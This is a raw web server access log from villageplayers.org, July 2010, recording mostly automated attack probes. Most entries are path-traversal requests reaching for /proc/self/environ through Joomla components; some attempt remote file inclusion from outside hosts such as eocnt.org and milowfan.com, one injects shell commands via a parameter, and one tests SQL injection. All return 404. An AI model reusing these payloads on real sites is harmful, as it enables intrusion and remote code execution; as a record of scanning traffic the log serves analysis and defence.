113.30.66.24 - - [30/Jul/2010:23:00:50 -0700] "POST /logs/access_100722.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.villageplayers.org"
113.30.66.24 - - [30/Jul/2010:23:00:50 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.villageplayers.org"
113.30.66.24 - - [30/Jul/2010:23:00:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.villageplayers.org"
113.30.66.24 - - [30/Jul/2010:23:00:52 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.villageplayers.org"
66.249.65.225 - - [30/Jul/2010:23:01:23 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:03:51 -0700] "GET /logs/access.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:03:51 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:03:51 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:23:04:08 -0700] "GET /logs/access.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:23:04:09 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:23:04:09 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:23:05:36 -0700] "GET /logs/access.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:23:05:36 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
188.165.217.175 - - [30/Jul/2010:23:05:37 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:08:03 -0700] "GET /logs/access_100722.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:08:03 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:08:03 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:11:35 -0700] "GET /logs/access_100525.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:11:35 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:11:35 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
67.201.60.20 - - [30/Jul/2010:23:11:47 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
67.201.60.20 - - [30/Jul/2010:23:11:48 -0700] "GET /index.php?option=com_myblog&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
67.201.60.20 - - [30/Jul/2010:23:11:48 -0700] "GET /logs//index.php?option=com_myblog&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:12:24 -0700] "GET /logs/access_100722.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:12:24 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:12:24 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:13:02 -0700] "GET /logs/access_100525.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
91.121.141.186 - - [30/Jul/2010:23:13:31 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
91.121.141.186 - - [30/Jul/2010:23:13:31 -0700] "GET /index.php?option=com_myblog&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
91.121.141.186 - - [30/Jul/2010:23:13:32 -0700] "GET /logs//index.php?option=com_myblog&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
90.165.40.15 - - [30/Jul/2010:23:23:32 -0700] "GET /logs/access_100704.log HTTP/1.1" 200 1063307 "http://www.google.com/search?q=94.23.211.138&hl=es&ei=1MBTTIz8G6T20gTwvLWBAw&start=30&sa=N" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8" "www.villageplayers.org"
90.165.40.15 - - [30/Jul/2010:23:23:33 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8" "www.villageplayers.org"
90.165.40.15 - - [30/Jul/2010:23:23:36 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:24:20 -0700] "GET /logs/access.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:24:20 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:24:20 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:27:50 -0700] "GET /logs/access_100722.log//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:27:50 -0700] "GET /indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
94.23.215.207 - - [30/Jul/2010:23:27:50 -0700] "GET /logs//indek.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.villageplayers.org"
88.250.57.232 - - [30/Jul/2010:23:32:18 -0700] "GET /logs/access_100731.log HTTP/1.0" 200 652221 "-" "Wget/1.11.4" "www.villageplayers.org"
95.131.68.185 - - [30/Jul/2010:23:40:09 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "villageplayers.org"
95.131.68.185 - - [30/Jul/2010:23:40:10 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "villageplayers.org"
92.43.201.28 - - [30/Jul/2010:23:40:33 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
92.43.201.28 - - [30/Jul/2010:23:40:48 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
92.43.201.28 - - [30/Jul/2010:23:41:18 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
92.43.201.28 - - [30/Jul/2010:23:42:40 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
95.131.68.185 - - [30/Jul/2010:23:43:43 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "villageplayers.org"
95.131.68.185 - - [30/Jul/2010:23:44:36 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.villageplayers.org"
95.131.68.185 - - [30/Jul/2010:23:44:52 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.villageplayers.org"
92.43.201.28 - - [30/Jul/2010:23:44:59 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
83.149.110.213 - - [30/Jul/2010:23:45:52 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "villageplayers.org"
92.43.201.28 - - [30/Jul/2010:23:46:25 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.villageplayers.org"
92.43.201.28 - - [30/Jul/2010:23:46:34 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.villageplayers.org"
92.43.201.28 - - [30/Jul/2010:23:46:54 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.villageplayers.org"
95.131.68.185 - - [30/Jul/2010:23:49:16 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "villageplayers.org"
95.131.68.185 - - [30/Jul/2010:23:49:24 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "villageplayers.org"
95.131.68.185 - - [30/Jul/2010:23:49:24 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "villageplayers.org"
95.131.68.185 - - [30/Jul/2010:23:49:26 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "villageplayers.org"
95.131.68.185 - - [30/Jul/2010:23:49:29 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "villageplayers.org"
202.47.80.12 - - [30/Jul/2010:23:51:03 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "villageplayers.org"
92.43.201.28 - - [30/Jul/2010:23:51:45 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
92.43.201.28 - - [30/Jul/2010:23:51:48 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
92.43.201.28 - - [30/Jul/2010:23:52:11 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
92.43.201.28 - - [30/Jul/2010:23:52:19 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
92.43.201.28 - - [30/Jul/2010:23:52:21 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
92.43.201.28 - - [30/Jul/2010:23:52:35 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "villageplayers.org"
202.47.80.12 - - [30/Jul/2010:23:55:06 -0700] "GET /index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "villageplayers.org"
211.236.43.200 - - [30/Jul/2010:23:55:26 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig.absolute.path=http://eocnt.org/appserv/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "villageplayers.org"
211.236.43.200 - - [30/Jul/2010:23:55:26 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig.absolute.path=http://eocnt.org/appserv/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "villageplayers.org"
211.236.43.200 - - [30/Jul/2010:23:55:26 -0700] "GET /logs/access.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig.absolute.path=http://eocnt.org/appserv/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "villageplayers.org"
202.190.174.181 - - [30/Jul/2010:23:56:51 -0700] "GET /index2.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "villageplayers.org"
92.43.201.28 - - [30/Jul/2010:23:57:05 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.villageplayers.org"
202.190.174.181 - - [30/Jul/2010:23:59:17 -0700] "GET /logs/access.log//index2.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "villageplayers.org"
202.190.174.181 - - [30/Jul/2010:23:59:17 -0700] "GET /index2.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "villageplayers.org"
202.190.174.181 - - [30/Jul/2010:23:59:18 -0700] "GET /logs//index2.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "villageplayers.org"
194.109.162.5 - - [30/Jul/2010:23:59:47 -0700] "GET /write_update.php?board_skin_path=http://milowfan.com/files/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
194.109.162.5 - - [30/Jul/2010:23:59:47 -0700] "GET /logs//write_update.php?board_skin_path=http://milowfan.com/files/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
194.109.162.5 - - [30/Jul/2010:23:59:48 -0700] "GET /logs/access_100628.log//write_update.php?board_skin_path=http://milowfan.com/files/ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
38.117.96.153 - - [30/Jul/2010:23:59:48 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "villageplayers.org"
95.131.68.185 - - [30/Jul/2010:23:59:48 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.villageplayers.org"
194.109.162.5 - - [30/Jul/2010:23:59:48 -0700] "GET /logs/access_100628.log//write_update.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
194.109.162.5 - - [30/Jul/2010:23:59:51 -0700] "GET /logs//write_update.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
194.109.162.5 - - [30/Jul/2010:23:59:51 -0700] "GET /write_update.php?board_skin_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.villageplayers.org"
38.117.96.153 - - [31/Jul/2010:00:00:41 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "villageplayers.org"
38.117.96.153 - - [31/Jul/2010:00:00:41 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "villageplayers.org"
38.117.96.153 - - [31/Jul/2010:00:00:41 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "villageplayers.org"
38.117.96.153 - - [31/Jul/2010:00:01:12 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.villageplayers.org"
202.47.80.12 - - [31/Jul/2010:00:01:38 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.villageplayers.org"
202.190.174.181 - - [31/Jul/2010:00:02:58 -0700] "GET /logs/access.log//index2.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "villageplayers.org"
202.190.174.181 - - [31/Jul/2010:00:02:59 -0700] "GET /index2.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "villageplayers.org"
202.190.174.181 - - [31/Jul/2010:00:02:59 -0700] "GET /logs//index2.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "villageplayers.org"
38.117.96.153 - - [31/Jul/2010:00:06:01 -0700] "GET /logs/access_100525.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.villageplayers.org"
38.117.96.153 - - [31/Jul/2010:00:06:01 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.villageplayers.org"
38.117.96.153 - - [31/Jul/2010:00:06:10 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.villageplayers.org"
38.117.96.153 - - [31/Jul/2010:00:06:11 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "villageplayers.org"
38.117.96.153 - - [31/Jul/2010:00:06:22 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "villageplayers.org"
207.46.204.185 - - [31/Jul/2010:00:06:36 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "villageplayers.org"
38.117.96.153 - - [31/Jul/2010:00:08:02 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "villageplayers.org"
